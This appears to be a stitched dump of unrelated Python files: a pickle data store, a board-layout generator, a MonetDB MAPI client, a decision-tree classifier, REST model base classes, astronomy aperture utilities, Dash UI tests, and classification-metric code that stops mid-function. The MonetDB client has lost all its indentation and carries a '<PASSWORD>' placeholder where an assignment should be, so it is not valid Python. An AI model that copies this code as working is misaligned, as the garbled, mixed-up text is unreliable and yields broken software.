        :return: pd.DataFrame or pd.Series read from pickle
        """
        return pd.read_pickle(self.filename)

    def write(self, df: pd.DataFrame, overwrite: bool = False) -> None:
        """
        Write pickle of data, eventually outer joined with an input DataFrame.

        :param df: input data
        :param overwrite: whether or not to overwrite existing file
        :return: None
        """
        # self.to_df() can fail with:
        # - KeyError if it tries to read a non-pickle file
        # - IOError if the file does not exist
        try:
            _in = [self.to_df()] if not overwrite else []
        except (KeyError, IOError):
            _in = []
        # pd.concat can fail with a TypeError if df is not an NDFrame object
        try:
            _df = pd.concat(_in + [df])
        except TypeError:
            _df = df
        _df.to_pickle(self.filename)
|
import math
import json
class Slot:
    """A single ball position on the board, with optional owner color."""

    def __init__(self, x, y, size, color=None):
        self.x = x
        self.y = y
        self.size = size
        self.color = color

    def data(self):
        """Serializable dict: coordinates and size truncated to ints."""
        payload = {key: int(getattr(self, key)) for key in ('x', 'y', 'size')}
        payload['color'] = self.color
        return payload
class Ring:
    """The circular track of slots, laid out clockwise starting at the top."""

    def __init__(self, x, y, rad, size, count):
        self.x = x
        self.y = y
        self.slots = []
        step = (2 * math.pi) / count
        # Accumulate the angle (rather than computing -i * step directly)
        # to keep float results bit-identical to the original layout.
        angle = 0
        for _ in range(count):
            offset_x = math.sin(angle) * rad
            offset_y = math.cos(angle) * rad
            self.slots.append(Slot(offset_x + x, offset_y + y, size))
            angle -= step

    def data(self):
        """Serializable dict with center and all slot payloads."""
        return {'x': self.x,
                'y': self.y,
                'slots': [slot.data() for slot in self.slots]
                }
class Home:
    """Base for a player's slot group: a color plus a ring entry position."""

    def __init__(self, color, entry):
        self.slots = []
        self.color = color
        self.entry = entry

    def data(self):
        """Serializable dict; entry is truncated to an int."""
        payload = {'color': self.color, 'entry': int(self.entry)}
        payload['slots'] = [slot.data() for slot in self.slots]
        return payload
class Start(Home):
    """A row of `count` colored start slots, centered `distance` away from
    (x, y) along `angle` and spread along `angle + direction`."""

    def __init__(self, x, y, angle, distance, width, size, count, direction, color, entry):
        super().__init__(color, entry)
        center_x = math.sin(angle) * distance
        center_y = math.cos(angle) * distance
        step_x = math.sin(angle + direction) * width / count
        step_y = math.cos(angle + direction) * width / count
        # Start half the row's span before the center so the row is centered.
        cur_x = (x + center_x) - (step_x * ((count - 1) / 2))
        cur_y = (y + center_y) - (step_y * ((count - 1) / 2))
        for _ in range(count):
            self.slots.append(Slot(cur_x, cur_y, size, color))
            cur_x += step_x
            cur_y += step_y
class Goal(Home):
    """A row of `count` uncolored goal slots, starting `distance + width`
    away from (x, y) along `angle` and stepping back toward the board."""

    def __init__(self, x, y, angle, distance, width, size, count, direction, color, entry):
        super().__init__(color, entry)
        base_x = math.sin(angle) * (distance + width)
        base_y = math.cos(angle) * (distance + width)
        step_x = math.sin(angle + direction) * width / count
        step_y = math.cos(angle + direction) * width / count
        cur_x = (x + base_x)
        cur_y = (y + base_y)
        for _ in range(count):
            self.slots.append(Slot(cur_x, cur_y, size))
            cur_x -= step_x
            cur_y -= step_y
def main():
    """Build the board layout (ring, starts, goals) and write it as JSON
    for the GUI at gui/data.json."""
    ball_rad = 6
    ring_count = 20
    colors = ["red", "yellow", "blue", "green"]

    ring = Ring(250, 250, 150, ball_rad, ring_count)

    # One start row per player, a quarter turn apart, entries spaced
    # evenly around the ring.
    starts = []
    entry = 0
    for a in range(4):
        starts.append(Start(250, 250,
                            a * (-math.pi / 2),
                            200, 100, ball_rad, 4, math.pi / 2, colors[a], entry))
        entry += ring_count / 4

    # Goal rows walk the colors in reverse, with entries offset past the ring.
    goals = []
    entry = ring_count
    for a in reversed(range(4)):
        goals.append(Goal(250, 250,
                          a * (-math.pi / 2),
                          20, 100, ball_rad, 4, 0, colors[a], entry))
        entry += ring_count / 4

    board = {'width': 500,
             'height': 500,
             'ring': ring.data(),
             'starts': [s.data() for s in starts],
             'goals': [g.data() for g in goals]}
    with open("gui/data.json", 'w') as f:
        f.write(json.JSONEncoder(indent=1).encode(board))


if __name__ == "__main__":
    main()
|
# The contents of this file are subject to the MonetDB Public License
# Version 1.1 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
# http://www.monetdb.org/Legal/MonetDBLicense
#
# Software distributed under the License is distributed on an "AS IS"
# basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the
# License for the specific language governing rights and limitations
# under the License.
#
# The Original Code is the MonetDB Database System.
#
# The Initial Developer of the Original Code is CWI.
# Portions created by CWI are Copyright (C) 1997-July 2008 CWI.
# Copyright August 2008-2015 MonetDB B.V.
# All Rights Reserved.
"""
This is the python2 implementation of the mapi protocol.
"""
import socket
import logging
import struct
import hashlib
import os
from io import BytesIO
from select import select
from greenlet import greenlet
from monetdb.exceptions import (OperationalError, DatabaseError, ProgrammingError,
NotSupportedError, InterfaceError)
logger = logging.getLogger("monetdb")
logger.addHandler(logging.NullHandler())

# Largest payload carried in one MAPI block: 8 KiB minus the 2-byte header.
MAX_PACKAGE_LENGTH = (1024 * 8) - 2

# Server reply prefixes: the first character(s) of a response identify its
# kind (see Connection.cmd / Connection._login below).
MSG_PROMPT = ""
MSG_MORE = "\1\2\n"  # server asks for more input (cmd() feeds it from `f`)
MSG_INFO = "#"       # informational message
MSG_ERROR = "!"      # error message
MSG_Q = "&"          # query result
MSG_QTABLE = "&1"
MSG_QUPDATE = "&2"
MSG_QSCHEMA = "&3"
MSG_QTRANS = "&4"
MSG_QPREPARE = "&5"
MSG_QBLOCK = "&6"
MSG_HEADER = "%"
MSG_TUPLE = "["
MSG_TUPLE_NOSLICE = "="
MSG_REDIRECT = "^"   # login redirect to another server
MSG_OK = "=OK"

# Connection life-cycle states.
STATE_INIT = 0
STATE_READY = 1

# Poll results -- presumably used by the async (greenlet/select) I/O path;
# confirm against the rest of the module.
POLL_READ = 0
POLL_WRITE = 1
POLL_OK = 2
# noinspection PyExceptionInherit
class Connection(object):
"""
MAPI (low level MonetDB API) connection
"""
def __init__(self):
self.state = STATE_INIT
self._result = None
self.socket = ""
self.hostname = ""
self.port = 0
self.username = ""
self.password = ""
self.database = ""
self.language = ""
self.connectionclosed = False
def connect(self, database, username, password, language, hostname=None,
port=None, unix_socket=None, var_async=False):
""" setup connection to MAPI server
unix_socket is used if hostname is not defined.
"""
if hostname and hostname[:1] == '/' and not unix_socket:
unix_socket = '%s/.s.monetdb.%d' % (hostname, port)
hostname = None
if not unix_socket and os.path.exists("/tmp/.s.monetdb.%i" % port):
unix_socket = "/tmp/.s.monetdb.%i" % port
elif not hostname:
hostname = 'localhost'
self.hostname = hostname
self.port = port
self.username = username
self.password = password
self.database = database
self.language = language
self.unix_socket = unix_socket
self.var_async = var_async
self.__isexecuting = False
if hostname:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# For performance, mirror MonetDB/src/common/stream.c socket settings.
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 0)
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket.connect((hostname, port))
else:
self.socket = socket.socket(socket.AF_UNIX)
self.socket.connect(unix_socket)
if self.language != 'control':
self.socket.send('0'.encode()) # don't know why, but we need to do this
if not (self.language == 'control' and not self.hostname):
# control doesn't require authentication over socket
self._login()
self.state = STATE_READY
def _login(self, iteration=0):
""" Reads challenge from line, generate response and check if
everything is okay """
challenge = self._getblock()
response = self._challenge_response(challenge)
self._putblock(response)
prompt = self._getblock().strip()
if len(prompt) == 0:
# Empty response, server is happy
pass
elif prompt == MSG_OK:
pass
elif prompt.startswith(MSG_INFO):
logger.info("%s" % prompt[1:])
elif prompt.startswith(MSG_ERROR):
logger.error(prompt[1:])
raise DatabaseError(prompt[1:])
elif prompt.startswith(MSG_REDIRECT):
# a redirect can contain multiple redirects, for now we only use
# the first
redirect = prompt.split()[0][1:].split(':')
if redirect[1] == "merovingian":
logger.debug("restarting authentication")
if iteration <= 10:
self._login(iteration=iteration + 1)
else:
raise OperationalError("maximal number of redirects "
"reached (10)")
elif redirect[1] == "monetdb":
self.hostname = redirect[2][2:]
self.port, self.database = redirect[3].split('/')
self.port = int(self.port)
logger.info("redirect to monetdb://%s:%s/%s" %
(self.hostname, self.port, self.database))
self.socket.close()
self.connect(self.hostname, self.port, self.username,
self.password, self.database, self.language)
else:
raise ProgrammingError("unknown redirect: %s" % prompt)
else:
raise ProgrammingError("unknown state: %s" % prompt)
def disconnect(self):
""" disconnect from the monetdb server """
self.state = STATE_INIT
self.socket.close()
def cmd(self, operation, f=None):
""" put a mapi command on the line"""
logger.debug("executing command %s" % operation)
if self.state != STATE_READY:
raise ProgrammingError
while True:
self._putblock(operation)
response = self._getblock()
if not len(response):
return ""
elif response.startswith(MSG_OK):
return response[3:].strip() or ""
elif response == MSG_MORE:
if f is not None:
operation = f.read(4096)
if operation != "":
continue
return self.cmd("")
elif response[0] in [MSG_Q, MSG_HEADER, MSG_TUPLE]:
return response
elif response[0] == MSG_ERROR:
raise OperationalError(response[1:])
elif (self.language == 'control' and not self.hostname):
if response.startswith("OK"):
return response[2:].strip() or ""
else:
return response
else:
raise ProgrammingError("unknown state: %s" % response)
def poll(self):
if not self.var_async:
raise InterfaceError("Poll called on a synchronous connection")
if not self.isexecuting():
raise InterfaceError("No command is currently executing")
state = self._greenlet.switch()
if self._greenlet.dead: # task has completed
self.__isexecuting = False
return POLL_OK
return state
def runasync(self, function):
self.__isexecuting = True
self._greenlet = greenlet(function)
def isexecuting(self):
return self.__isexecuting
def fileno(self):
return self.socket.fileno()
def _challenge_response(self, challenge):
""" generate a response to a mapi login challenge """
challenges = challenge.split(':')
salt, identity, protocol, hashes, endian = challenges[:5]
password = <PASSWORD>
if protocol == '9':
algo = challenges[5]
try:
h = hashlib.new(algo)
h.update(password.encode())
password = h.hexdigest()
except ValueError as e:
raise NotSupportedError(e.message)
else:
raise NotSupportedError("We only speak protocol v9")
h = hashes.split(",")
if "SHA1" in h:
s = hashlib.sha1()
s.update(password.encode())
s.update(salt.encode())
pwhash = "{SHA1}" + s.hexdigest()
elif "MD5" in h:
m = hashlib.md5()
m.update(password.encode())
m.update(salt.encode())
pwhash = "{MD5}" + m.hexdigest()
else:
raise NotSupportedError("Unsupported hash algorithms required"
" for login: %s" % hashes)
return ":".join(["BIG", self.username, pwhash, self.language,
self.database]) + ":"
def _getblock(self):
""" read one mapi encoded block """
if (self.language == 'control' and not self.hostname):
return self._getblock_socket() # control doesn't do block
# splitting when using a socket
else:
return self._getblock_inet()
def _getblock_inet(self):
result = BytesIO()
last = 0
while not last:
flag = self._getbytes(2)
unpacked = struct.unpack('<H', flag)[0] # little endian short
length = unpacked >> 1
last = unpacked & 1
result.write(self._getbytes(length))
result_str = result.getvalue()
return result_str.decode()
def _getblock_socket(self):
buffer = BytesIO()
while True:
x = self.socket.recv(1)
if len(x):
buffer.write(x)
else:
break
return buffer.getvalue().strip()
def _getbytes(self, bytes_):
"""Read an amount of bytes from the socket"""
result = BytesIO()
count = bytes_
while count > 0:
if self.var_async:
parent = greenlet.getcurrent().parent
# Switch to parent greenlet if var_async and no data ready to read
while parent and not select([self.socket.fileno()], [], [], 0)[0]:
parent.switch(POLL_READ)
recv = self.socket.recv(count)
if len(recv) == 0:
self.connectionclosed = True
raise OperationalError("Server closed connection")
count -= len(recv)
result.write(recv)
return result.getvalue()
def _putblock(self, block):
""" wrap the line in mapi format and put it into the socket """
if (self.language == 'control' and not self.hostname):
return self.socket.send(block.encode()) # control doesn't do block
# splitting when using a socket
else:
self._putblock_inet(block)
def _putblock_inet(self, block):
pos = 0
last = 0
while not last:
data = block[pos:pos + MAX_PACKAGE_LENGTH].encode()
length = len(data)
if length < MAX_PACKAGE_LENGTH:
last = 1
flag = struct.pack('<H', (length << 1) + last)
if self.var_async:
# Switch to parent greenlet if var_async and socket not ready to accept data
parent =greenlet.getcurrent().parent
while parent and not select([], [self.socket.fileno()], [], 0)[1]:
parent.switch(POLL_WRITE)
self.socket.send(flag)
self.socket.send(data)
pos += length
def __del__(self):
if self.socket:
self.socket.close()
def __repr__(self):
return "<%s.%s object at 0x%x; url: 'monetdb://%s:%s/%s'>" % (
self.__class__.__module__, self.__class__.__name__, id(self), self.hostname, self.port,
self.database)
# Backwards compatibility: this class used to be exported under the name Server.
Server = Connection
|
def findDecision(obj):
    """Auto-generated (chefboost-style) decision tree, hand-simplified.

    Feature index map: 0 Passanger, 1 Weather, 2 Time, 3 Coupon,
    4 Coupon_validity, 5 Gender, 6 Age, 7 Maritalstatus, 8 Children,
    9 Education, 10 Occupation, 11 Income, 12 Bar, 13 Coffeehouse,
    14 Restaurantlessthan20, 15 Restaurant20to50, 16 Direction_same,
    17 Distance.

    The original machine-generated tree contained many degenerate branches
    whose arms all returned the same label; this version collapses them into
    the equivalent flat guard clauses. Assumes numeric (non-NaN) features.
    Returns the string 'True' or 'False'.
    """
    if obj[17] > 2:              # Distance
        return 'False'
    if obj[10] > 17:             # Occupation
        return 'False'
    if obj[3] <= 3:              # Coupon: cheap-coupon subtree
        # Every branch here returned 'True' except the narrow path below.
        if obj[6] > 3 or obj[12] <= 0.0 or obj[13] > 2.0:   # Age / Bar / Coffeehouse
            return 'True'
        if obj[9] > 2:           # Education
            return 'False'
        if obj[2] <= 1 or obj[1] > 0:                        # Time / Weather
            return 'True'
        return 'True' if obj[0] > 1 else 'False'             # Passanger
    # obj[3] > 3: expensive-coupon subtree
    if obj[12] > 1.0:            # Bar
        return 'False'
    if obj[13] > 2.0:            # Coffeehouse
        return 'True'
    if obj[11] <= 1:             # Income
        return 'True'
    if obj[0] <= 1:              # Passanger
        return 'False'
    if obj[2] > 0:               # Time
        return 'False'
    return 'True' if obj[6] > 1 else 'False'                 # Age
|
import abc
import logging
from typing import Callable, Optional, Type, TypeVar
import requests
from pydantic import Field
from pydantic.main import BaseModel
from nonbonded.library.config import settings
T = TypeVar("T", bound="BaseREST")
class CollectionMeta(BaseModel):
    """A data model which stores metadata about a retrieved collection, such as
    pagination information."""
    # These mirror the API's skip/limit pagination query parameters.
    skip: int = Field(..., description="The number of skipped records.")
    limit: int = Field(..., description="The maximum number of records returned.")
    total_records: int = Field(
        ..., description="The total number of records in the collection"
    )
class BaseORM(BaseModel, abc.ABC):
    """Base pydantic model with ORM mode enabled and JSON file export."""

    class Config:
        orm_mode = True

    def to_file(self, file_path: str):
        """JSON serializes this object and saves the output to the specified
        file path.

        Parameters
        ----------
        file_path: str
            The path to save the JSON serialized object to.
        """
        serialized = self.json()
        with open(file_path, "w") as output_file:
            output_file.write(serialized)
class BaseREST(BaseORM, abc.ABC):
    """Base class for models which can be created, updated, retrieved and
    deleted through the project's RESTful API."""

    @classmethod
    @abc.abstractmethod
    def _get_endpoint(cls, **kwargs):
        """Return the URL used to GET an instance of this class."""
        raise NotImplementedError()

    @abc.abstractmethod
    def _post_endpoint(self):
        """Return the URL used to POST (create) this object."""
        raise NotImplementedError()

    @abc.abstractmethod
    def _put_endpoint(self):
        """Return the URL used to PUT (update) this object."""
        raise NotImplementedError()

    @abc.abstractmethod
    def _delete_endpoint(self):
        """Return the URL used to DELETE this object."""
        raise NotImplementedError()

    @staticmethod
    def _check_response(request):
        """Raise for HTTP errors, logging the server's error text first.

        Factored out of ``_upload``, ``delete`` and ``from_rest``, which all
        repeated the same try/except block; the redundant no-op
        ``except Exception: raise`` clauses were dropped.
        """
        try:
            request.raise_for_status()
        except requests.exceptions.HTTPError as error:
            logging.exception(error.response.text)
            raise

    def _upload(self, request_function: Callable, url: str) -> T:
        """The internal implementation of the upload and update methods."""
        request = request_function(
            url=url,
            data=self.json(),
            headers={"access_token": settings.ACCESS_TOKEN},
        )
        self._check_response(request)
        # The API echoes back the stored object (possibly with new ids).
        return self.__class__.parse_raw(request.text)

    def upload(self, requests_class=requests) -> T:
        """Attempt to upload this object to the RESTful API for the first time.

        This function should only be used for the initial upload. To update an
        existing instance, used the ``update`` function instead.

        Objects which have been uploaded to the RESTful API can be easily
        retrieved using the ``from_rest`` class function.

        An exception will be raised if the API already contains an instance of
        this object with the same identifiers.

        Notes
        -----
        The RESTful API returns back the object which was posted - this may not
        be identical to the initially submitted object as the API may have
        assigned / changed some of the ids. The returned object should
        **always** be used in place of the initial one.
        """
        return self._upload(requests_class.post, self._post_endpoint())

    def update(self, requests_class=requests) -> T:
        """Attempt to update this object on the RESTful API. This function
        assumes that this object has already been uploaded using the ``upload``
        function.

        An exception will be raised if this object has not already been
        uploaded.
        """
        return self._upload(requests_class.put, self._put_endpoint())

    def delete(self, requests_class=requests):
        """Attempt to delete this object on the RESTful API. This function
        assumes that this object has already been uploaded using the ``upload``
        function.

        An exception will be raised if this object has not already been
        uploaded.
        """
        request = requests_class.delete(
            url=self._delete_endpoint(), headers={"access_token": settings.ACCESS_TOKEN}
        )
        self._check_response(request)

    @classmethod
    def from_rest(cls: Type[T], **kwargs) -> T:
        """Attempts to retrieve an instance of this object from the RESTful API
        based on its unique identifier(s)
        """
        requests_class = kwargs.pop("requests_class", requests)
        request = requests_class.get(cls._get_endpoint(**kwargs))
        cls._check_response(request)
        return cls.parse_raw(request.text)
class BaseRESTCollection(BaseORM, abc.ABC):
    """Base class for (optionally paginated) collections of objects retrieved
    from the RESTful API."""

    # Populated by the API when the collection is paginated.
    metadata: Optional[CollectionMeta] = Field(
        None,
        description="Metadata associated with a collection retrieved from a RESTful "
        "API such as pagination information.",
    )

    @classmethod
    @abc.abstractmethod
    def _get_endpoint(cls, **kwargs):
        """Return the URL used to GET this collection."""
        raise NotImplementedError()

    @classmethod
    def from_rest(cls: Type[T], **kwargs) -> T:
        """Attempts to retrieve an instance of this object from the RESTful API
        based on its unique identifier(s)
        """
        requests_class = kwargs.pop("requests_class", requests)
        request = requests_class.get(cls._get_endpoint(**kwargs))
        # Log the server's error text before propagating HTTP failures.
        # (The redundant no-op ``except Exception: raise`` clause was dropped.)
        try:
            request.raise_for_status()
        except requests.exceptions.HTTPError as error:
            logging.exception(error.response.text)
            raise
        return cls.parse_raw(request.text)
|
<reponame>alex-parker/kmao
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
k-means aperture optimization utilities.
see example1.py file for use cases.
'''
import numpy as np
from scipy.signal import convolve2d
from scipy.optimize import fmin, minimize
from scipy.ndimage import shift
from scipy.stats import trimboth
from sklearn.cluster import KMeans
__version__ = "0.4"
### ---------------------------------------------------------------------------
### ---------------------------------------------------------------------------
def cross_dilate(init_mask, N):
    """Binary-dilate *init_mask* N times with a 3x3 cross-shaped kernel.

    Each pass grows the True region by one pixel in the four cardinal
    directions; the result is returned as a boolean array.
    """
    kernel = [[0, 1, 0], [1, 1, 1], [0, 1, 0]]
    mask = init_mask.copy()
    for _ in range(N):
        mask = convolve2d(mask, kernel, mode='same')
    return mask > 0
### ---------------------------------------------------------------------------
### ---------------------------------------------------------------------------
def lfstdv(y_in, x_in=None):
    """Robust estimate of the point-to-point scatter of the series *y_in*.

    If *x_in* is given, *y_in* is first reordered by ascending *x_in*.

    Bug fix: the original ``if x_in != None:`` comparison broadcasts
    elementwise for numpy arrays and raises "truth value of an array is
    ambiguous"; an identity check is the correct test.
    """
    y = y_in.copy()
    if x_in is not None:
        y = y[np.argsort(x_in)]
    delta = np.sort((y[1:-1]-y[2:])-0.5*(y[:-2]-y[2:]))
    ### scaled to match standard deviation of
    ### gaussian noise on constant signal
    ### also, trim outliers.
    return 0.8166137*np.std( trimboth( delta, 0.05 ) )
### ---------------------------------------------------------------------------
### ---------------------------------------------------------------------------
def scatterscale(params, data, aperture_id, ret=False):
    """Rescale each aperture's points by its entry in *params*.

    The most populous aperture is the reference and is left unscaled; the
    remaining apertures consume one multiplier each from *params*, in the
    order of their sorted unique ids. Returns the scaled series when *ret*
    is True, otherwise its robust scatter (via lfstdv).
    """
    ids = np.unique(aperture_id)
    counts = [np.sum(aperture_id == z) for z in ids]
    reference_id = ids[np.argmax(counts)]
    scaled = np.zeros(data.shape)
    param_index = 0
    for z in ids:
        member = aperture_id == z
        if z == reference_id:
            scaled[member] = data[member]
        else:
            scaled[member] = data[member] * params[param_index]
            param_index += 1
    if ret:
        return scaled
    return lfstdv(scaled)
### ---------------------------------------------------------------------------
### ---------------------------------------------------------------------------
def scatternorm(data, aperture_id):
    """Fit per-aperture scale factors that minimize the local scatter of
    *data* (Powell method) and return the rescaled series."""
    n_free = np.unique(aperture_id).size - 1
    initial_guess = np.ones(n_free)
    fit = minimize(scatterscale, initial_guess, args=(data, aperture_id),
                   method='powell', options={'disp':True})
    return scatterscale(fit.x, data, aperture_id, ret=True)
### ---------------------------------------------------------------------------
### ---------------------------------------------------------------------------
def cluster(data, mask0, N=5):
    """K-means cluster the image stack into N aperture groups.

    Each image is normalized by its mean inside *mask0*; the in-mask pixel
    vector is the feature. Returns one cluster id per image.
    """
    feature_rows = []
    for frame in data:
        vec = frame.copy()
        vec /= np.nanmean(vec[mask0])
        feature_rows.append(vec[mask0].ravel())
    features = np.array(feature_rows)
    # NaN pixels carry no information; zero them so KMeans can run.
    features[np.isnan(features)] = 0.0
    model = KMeans(init='k-means++', n_clusters=N,
                   n_init=min(5 * N, data.shape[0]), algorithm='full')
    model.fit(features)
    aperture_id = model.predict(features)
    for z in np.unique(aperture_id):
        print('Aperture %d -- %d images'%(z+1, np.sum(aperture_id==z)))
    return aperture_id
### ---------------------------------------------------------------------------
### ---------------------------------------------------------------------------
def reduce_apertures(data, mask0, aperture_id, correct=True, thresh=0.99, grow=1):
    """Build one optimized photometric aperture per cluster and extract a
    time series.

    For each cluster, the pixels with the smallest mean signal are trimmed
    from mask0 until the retained mean flux fraction would drop below
    *thresh*; the surviving mask is then dilated *grow* times and summed
    over every image in the cluster. If *correct*, per-aperture scale
    factors are fitted via scatternorm to stitch the clusters together.
    """
    time_series = np.zeros(aperture_id.shape)
    for z in np.unique(aperture_id):
        inds = np.where(aperture_id==z)
        delta = data[inds].copy()
        delta_ratio = data[inds].copy() ### left redundant in case a sky ratio is needed
        # Mean image of this cluster; negative / NaN pixels contribute nothing.
        max_delta = np.nanmean(delta, axis=0)
        max_delta_ratio = np.nanmean(delta_ratio, axis=0)
        max_delta[max_delta<=0] = 0
        max_delta[np.isnan(max_delta)] = 0
        temp_mask = mask0.copy()
        max_delta[~temp_mask] = 0
        # inf outside the mask so argmin only ever picks in-mask pixels.
        max_delta_ratio[~temp_mask] = np.inf
        tot = np.nansum(max_delta[temp_mask])
        # Greedily drop the faintest remaining pixel while the kept flux
        # fraction stays above thresh.
        while np.nansum(max_delta[temp_mask]) / tot > thresh:
            ij = np.unravel_index(max_delta_ratio.argmin(), max_delta_ratio.shape)
            temp_mask[ij] = False
            max_delta_ratio[ij] = np.inf
        temp_mask = cross_dilate(temp_mask, grow)
        for i in inds[0]:
            time_series[i] = np.nansum(data[i][temp_mask])
    if correct:
        time_series = scatternorm(time_series, aperture_id)
    return time_series
### ---------------------------------------------------------------------------
### ---------------------------------------------------------------------------
|
"""
Testing of callbacks in non-Python input snippets.
"""
from pathlib import Path
import dash.testing.wait as wait
from .helpers import load_jl_app, load_r_app
HERE = Path(__file__).parent
def test_r_input_simple(dashr):
    """Run the R simple-input app and exercise its text-input callback."""
    r_app = load_r_app((HERE.parent / "input" / "simple.R"), "text_input")
    dashr.start_server(r_app)
    check_input_simple_callbacks(dashr)
def test_jl_input_simple(dashjl):
    """Run the Julia simple-input app and exercise its text-input callback."""
    jl_app = load_jl_app((HERE.parent / "input" / "simple.jl"), "text_input")
    dashjl.start_server(jl_app)
    check_input_simple_callbacks(dashjl)
def check_input_simple_callbacks(runner):
    """Type into #input and wait for #output to echo the same text."""
    runner.find_element("#input").send_keys("x")
    wait.until(
        lambda: runner.find_element("#output").text == "x",
        timeout=4,
    )
# --------------------------------
# NOTE(review): "ckeck" is a typo in the test name; kept so the pytest test id
# stays stable for existing CI filters.
def test_r_input_radio_ckeck(dashr):
    """Run the R radio/check app and exercise its selection callbacks."""
    r_app = load_r_app((HERE.parent / "input" / "radio_check.R"), "inputs")
    dashr.start_server(r_app)
    check_input_radio_check_callbacks(dashr)
def test_jl_input_radio_check(dashjl):
    """Run the Julia radio/check app and exercise its selection callbacks."""
    jl_app = load_jl_app((HERE.parent / "input" / "radio_check.jl"), "inputs")
    dashjl.start_server(jl_app)
    check_input_radio_check_callbacks(dashjl)
def check_input_radio_check_callbacks(runner):
    """Toggle the second radio item, checklist item and switch, and verify the
    summary output updates accordingly."""
    # Initial state rendered by the app.
    wait.until(
        lambda: runner.find_element("#radioitems-checklist-output").text
        == "Radio button 1, 1 checklist item and 1 switch selected.",
        timeout=10,
    )
    # The "_dbcprivate_" selectors target dbc's internally generated input ids
    # (assumed stable across the R and Julia apps -- confirm on dbc upgrades).
    runner.find_element(
        "label[for='_dbcprivate_radioitems_radioitems-input_input_2']"
    ).click()
    runner.find_element(
        "label[for='_dbcprivate_checklist_checklist-input_input_2']"
    ).click()
    runner.find_element(
        "label[for='_dbcprivate_checklist_switches-input_input_2']"
    ).click()
    wait.until(
        lambda: runner.find_element("#radioitems-checklist-output").text
        == "Radio button 2, 2 checklist items and 2 switches selected.",
        timeout=10,
    )
# --------------------------------
def test_r_input_radio_check_standalone(dashr):
    """Run the R standalone radio/check app and exercise its callbacks."""
    r_app = load_r_app(
        (HERE.parent / "input" / "radio_check_standalone.R"),
        "standalone_radio_check",
    )
    dashr.start_server(r_app)
    check_input_radio_check_standalone_callbacks(dashr)
def test_jl_input_radio_check_standalone(dashjl):
    """Run the Julia standalone radio/check app and exercise its callbacks."""
    jl_app = load_jl_app(
        (HERE.parent / "input" / "radio_check_standalone.jl"),
        "standalone_radio_check",
    )
    dashjl.start_server(jl_app)
    check_input_radio_check_standalone_callbacks(dashjl)
def check_input_radio_check_standalone_callbacks(runner):
    """Click the standalone checkbox, switch and radio twice, checking the
    summary flips False -> True -> False."""
    # All three widgets report the same boolean, so one format placeholder
    # is reused for each.
    outcome = (
        "Selections: Checkbox: {0}, Toggle Switch: {0}, Radio Button: {0}"
    )
    wait.until(
        lambda: runner.find_element("#standalone-radio-check-output").text
        == outcome.format(False),
        timeout=10,
    )
    runner.find_element("#standalone-checkbox").click()
    runner.find_element("#standalone-switch").click()
    runner.find_element("#standalone-radio").click()
    wait.until(
        lambda: runner.find_element("#standalone-radio-check-output").text
        == outcome.format(True),
        timeout=10,
    )
    # Clicking again should toggle everything back off.
    runner.find_element("#standalone-checkbox").click()
    runner.find_element("#standalone-switch").click()
    runner.find_element("#standalone-radio").click()
    wait.until(
        lambda: runner.find_element("#standalone-radio-check-output").text
        == outcome.format(False),
        timeout=10,
    )
|
import dill
import numpy as np
import pandas as pd
import plotly.graph_objects as go
from sklearn import metrics
def show_results(
    predictions,
    model_name,
    show_plot=True,
    save_plot=True,
    save_folder="data/processed",
):
    """Compute and persist all evaluation artifacts for a fitted model.

    Runs the binary-classification and regression metric computations, then
    draws the ROC, precision-recall and prediction plots.

    Parameters
    ----------
    predictions : DataFrame-like with "y_true", "y_pred" and "y_proba"
        columns (assumed from the helpers below -- confirm against callers).
    model_name : filename prefix for every saved artifact.
    show_plot / save_plot : toggles for displaying / writing the figures.
    save_folder : destination folder for tables, pickles and HTML plots.
    """
    binary_classification_results = (
        get_binary_classification_results(
            predictions, model_name, save_folder
        )
    )
    # NOTE(review): return value unused here; the call is kept for its
    # file-writing side effects.
    regression_results = get_regression_results(
        predictions, model_name, save_folder
    )
    plot_roc_auc_curve(
        predictions, model_name, show_plot, save_plot, save_folder
    )
    # The PR plot needs the random-precision baseline computed above.
    plot_precision_recall_curve(
        predictions,
        binary_classification_results,
        model_name,
        show_plot,
        save_plot,
        save_folder,
    )
    plot_predictions(
        predictions, model_name, show_plot, save_plot, save_folder
    )
def get_binary_classification_results(dataset, model_name="model", save_folder="data"):
    """Derive confusion-matrix statistics for binary predictions.

    Parameters
    ----------
    dataset : DataFrame with 0/1 "y_true" and "y_pred" columns.
    model_name : filename prefix for the saved artifacts.
    save_folder : folder receiving the CSV table and pickled dict.

    Returns
    -------
    dict mapping metric names to values; ratios whose denominator is zero
    (or whose prerequisite metric is unavailable) are stored as None.

    Side effects: writes
    ``{save_folder}/{model_name}_binary_classification_results_table.csv``
    and ``..._binary_classification_results_dict.pkl``.
    """
    binary_classification_results = dict()
    # Population: rows where both labels are valid 0/1 values.
    total_population = len(
        dataset[(dataset["y_true"].isin([0, 1])) & (dataset["y_pred"].isin([0, 1]))]
    )
    binary_classification_results["total_population"] = total_population
    total_positive = len(
        dataset[dataset["y_true"] == 1]
    )
    binary_classification_results["total_positive"] = total_positive
    total_negative = len(
        dataset[dataset["y_true"] == 0]
    )
    binary_classification_results["total_negative"] = total_negative
    # Precision a random classifier would achieve (positive prevalence).
    random_precision = total_positive / total_population
    binary_classification_results["random_precision"] = random_precision
    # Confusion-matrix cells.
    true_positive = len(dataset[(dataset["y_true"] == 1) & (dataset["y_pred"] == 1)])
    binary_classification_results["true_positive"] = true_positive
    false_negative = len(dataset[(dataset["y_true"] == 1) & (dataset["y_pred"] == 0)])
    binary_classification_results["false_negative"] = false_negative
    false_positive = len(dataset[(dataset["y_true"] == 0) & (dataset["y_pred"] == 1)])
    binary_classification_results["false_positive"] = false_positive
    true_negative = len(dataset[(dataset["y_true"] == 0) & (dataset["y_pred"] == 0)])
    binary_classification_results["true_negative"] = true_negative
    if (true_positive + false_negative) > 0:
        recall = true_positive / (true_positive + false_negative)
        miss_rate = false_negative / (true_positive + false_negative)
    else:
        recall = None
        miss_rate = None
    binary_classification_results["recall"] = recall
    binary_classification_results["miss_rate"] = miss_rate
    if (false_positive + true_negative) > 0:
        fall_out = false_positive / (false_positive + true_negative)
        specificity = true_negative / (false_positive + true_negative)
    else:
        fall_out = None
        specificity = None
